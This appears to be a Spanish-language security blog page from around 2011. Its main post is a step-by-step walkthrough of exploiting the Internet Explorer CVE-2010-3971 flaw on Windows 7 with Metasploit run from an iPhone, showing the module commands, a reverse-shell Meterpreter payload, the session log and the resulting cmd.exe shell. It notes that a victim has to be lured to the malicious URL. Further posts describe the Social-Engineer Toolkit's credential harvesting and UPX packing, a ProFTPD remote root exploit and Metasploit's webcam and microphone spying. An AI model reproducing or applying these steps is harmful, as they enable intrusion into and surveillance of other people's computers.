Explotando Windows 7 - 0day de Internet Explorer CVE 2010-3971 con Metasploit desde iphone 4:


Explotable vía 3G o Wifi.
También válido para Metasploit para Windows, Linux, MacOSX.

Descripción de la vulnerabilidad:

CVE 2010-3971
Vulnerabilidad de uso después de liberación en la función CSharedStyleSheet::Notify en el parseado Cascading Style Sheets (CSS) en mshtml.dll, como el usado en Microsoft Internet Explorer v7 y v8 y probablemente otros productos, permite a atacantes remotos causar una denegación de servicio (caída) y ejecutar código de su elección a través de múltiples llamadas @import en un documento manipulado.
Existen varios exploits públicos, pero usaré Metasploit para nuestro ejemplo.
Módulo de metasploit que utilizaremos: ms11_xxx_ie_css_import.

msf > use exploit/windows/browser/ms11_xxx_ie_css_import
msf exploit (ms11_xxx_ie_css_import) > set PAYLOAD windows/meter
preter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit (ms11_xxx_ie_css_import) > set SRVHOST 172.16.0.101
SRVHOST => 172.16.0.101
msf exploit (ms11_xxx_ie_css_import) > set LHOST 172.16.0.101
LHOST => 172.16.0.101
msf exploit (ms11_xxx_ie_css_import) > exploit
[+] Exploit running as background job.
[+] Started reverse handler on 172.16.0.101:4444
[+] Using URL: http://172.16.0.101:8080/gbWbMzi4





Descripción 

-Definimos el exploits a utilizar
use exploit/windows/browser/ms11_xxx_ie_css_import
-Definimos payload
set PAYLOAD windows/meterpreter/reverse_tcp
-Definimos donde se ejecutara el servidor (en este caso nuestro iPhone)
set SRVHOST 172.16.0.101
-Definimos IP donde se conectará la víctima (en este caso nuestro iPhone)
set LHOST 172.16.0.101
-Ejecutamos el exploit 
exploit

Metasploit generará una URL maliciosa:

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.0.101:4444
[*] Using URL: http://172.16.0.101:8080/gbWbMzi4
[*] Server started.

http://172.16.0.101:8080/gbWbMzi4

Esa URL debe ser ejecutada por la víctima desde Internet Explorer. Existen diferentes modos de conseguirlo, pero no entraré en detalles.

Cuando la víctima acceda a la URL, aparecerá algo similar a lo siguiente:

msf exploit(ms11_xxx_ie_css_import) > [*] 172.16.0.101:53759 Received request for "/gbWbMzi4"
[*] 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import redirect
[*] 172.16.0.101:53759 Received request for "/gbWbMzi4/sa1Ck.html"
[*] 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import HTML
[*] 172.16.0.101:53759 Received request for "/gbWbMzi4/generic-1294064502.dll"
[*] 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import .NET DLL
[*] 172.16.0.101:53761 Received request for "/gbWbMzi4/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 172.16.0.101:53761 Sending windows/browser/ms11_xxx_ie_css_import CSS
[*] Sending stage (749056 bytes) to 172.16.0.101
[*] Meterpreter session 1 opened (172.16.0.101:4444 -> 172.16.0.101:53762) at 2011-01-03 15:21:47 +0100
[*] Session ID 1 (172.16.0.101:4444 -> 172.16.0.101:53762) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2320)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2492
[*] New server process: notepad.exe (2492)

Conexión:
msf exploit (ms11_xxx_ie_css_import) > sessions -i 1

Conseguir shell al sistema:
meterpreter > execute -f cmd.exe -H -i


Process 2544 created.
Channel 1 created.
Microsoft Windows [Versión 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Users\Tester\Desktop>

Instalando Metasploit 3.5.1+ y SET en iPhone 4

Vía SSH

#MSF3

apt-get install subversion nano wget python
cd /private/var/
wget http://apt.saurik.com/cydia/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb
dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb
apt-get install rubygems
wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2
tar jxpf framework-3.5.1.tar.bz2
cd msf3
./msfconsole


#SET

cd /private/var/
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
./set #Aceptar la instalación de los módulos de python que nos requiera.




Nota: No actualizar ruby, ya que romperá la instalación.

Social-Engineer Toolkit (SET) v1.1 Released


SET v1.1 Codename: “Happy Holidays” Released

This release adds new Metasploit-based client-side attacks (4 in total), many optimizations on the SET web server including proper threading to make it run faster as well as an overall of optimizations through the entire code base. The next version 1.2 will be an overhaul of function calls and centralization of modules to allow easier additions for third party contributions.

Also added in this release is a new set_config option that will automatically disable the auto redirection on the Java Applet so in examples with Multi-Attack where you use Java Applet + Credential Harvester it will now only redirect once the credential harvester is executed. This is especially useful when you get your payload execution and harvest credentials all within one attack.

Lastly, another great option is I've added UPX support for the Java Applet and Payload Generator attacks. In the set_config is a new option called "UPX_ENCODE=ON", this is on by default and checks to see if UPX is in the default Back|Track path. If it's not it will automatically disable the UPX packing, otherwise it will automatically pack the executable with the UPX packer. You can turn this off in the set_config by specifying UPX_ENCODE=OFF. Enjoy the latest version of SET, there is more to come with the next 1.2 release which is currently under development.

ProFTPD with mod_sql pre-authentication, remote root



This paper describes and explores a pre-authentication remote root heap overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow, due to the how the ProFTPD heap works, and how the bug is exploited via variable substition. The vulnerability was inadvertently mitigated (from remote root, at least :( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql where you could inject SQL and bypass authentication. That vulnerability that mitigated it is documented in CVE-2009-0542. The specific vulnerability we are exploring is an unbounded copy operation in sql_prepare_where(), which has not been fixed yet. Also, I'd like to preemptively apologise for the attached code. It evolved over time in piecemeal fashion, and isn't overly pretty/readable by now.

Full Document and Exploit here
Documento completo y Exploit aquí

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC

Esp
-
La vulnerabilidad permite provocar una denegación de servicio. Exploit con la prueba de concepto aquí.

Eng
-
The vulnerability can cause a denial of service. Exploit the proof of concept
here.

Metasploit Framework 3.5.1 Released

Esp
-
Liberada la versión 3.5.1 de Metasploit, Express Metasploit, y Metasploit Pro. Esta versión añade 47 nuevos módulos y 8 nuevos scripts desde la versión 3.5.0, para un total de 635 explotaciones, 314 módulos auxiliares y 215 utilidades. Metasploit ofrece ahora explotar SAP BusinessObjects, servidores de correo Exim, ProFTPD instalaciones de transferencia de archivos, los despliegues SCADA (BACnet, Citect, Datac), servidores Novell NetWare, Microsoft Internet Explorer y plugins tales como Flash y Java de Oracle. Se han realizado mejoras a las hazañas de Java del lado del cliente. Meterpreter ahora es compatible con la captura de cámara web, micrófono y pantalla para espionaje. Módulos de fuerza bruta, admite nombres de usuario vacío y ahora incluyen el Unix "r "de los servicios, VNC y SNMP. La importación desde Nessus plugin se ha actualizado, se ha dado soporte básico para nCircle, y ahora se puede exportar a PWDump y John the Ripper.

Eng
-
Versions 3.5.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro have gone live! This synchronized release adds 47 new modules and 8 new scripts since 3.5.0, bringing the total to 635 exploits, 314 auxiliary modules, and 215 payloads. Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. Improvements have been made to the client-side Java exploits. The Meterpreter payload now supports webcam, microphone, and screen spying. Brute force modules support empty user names and now include the Unix "r" services, VNC, and SNMP protocols. The Nessus import plugin has been updated, basic support for nCircle has been added, and the framework can now export into the PWDump and John the Ripper formats.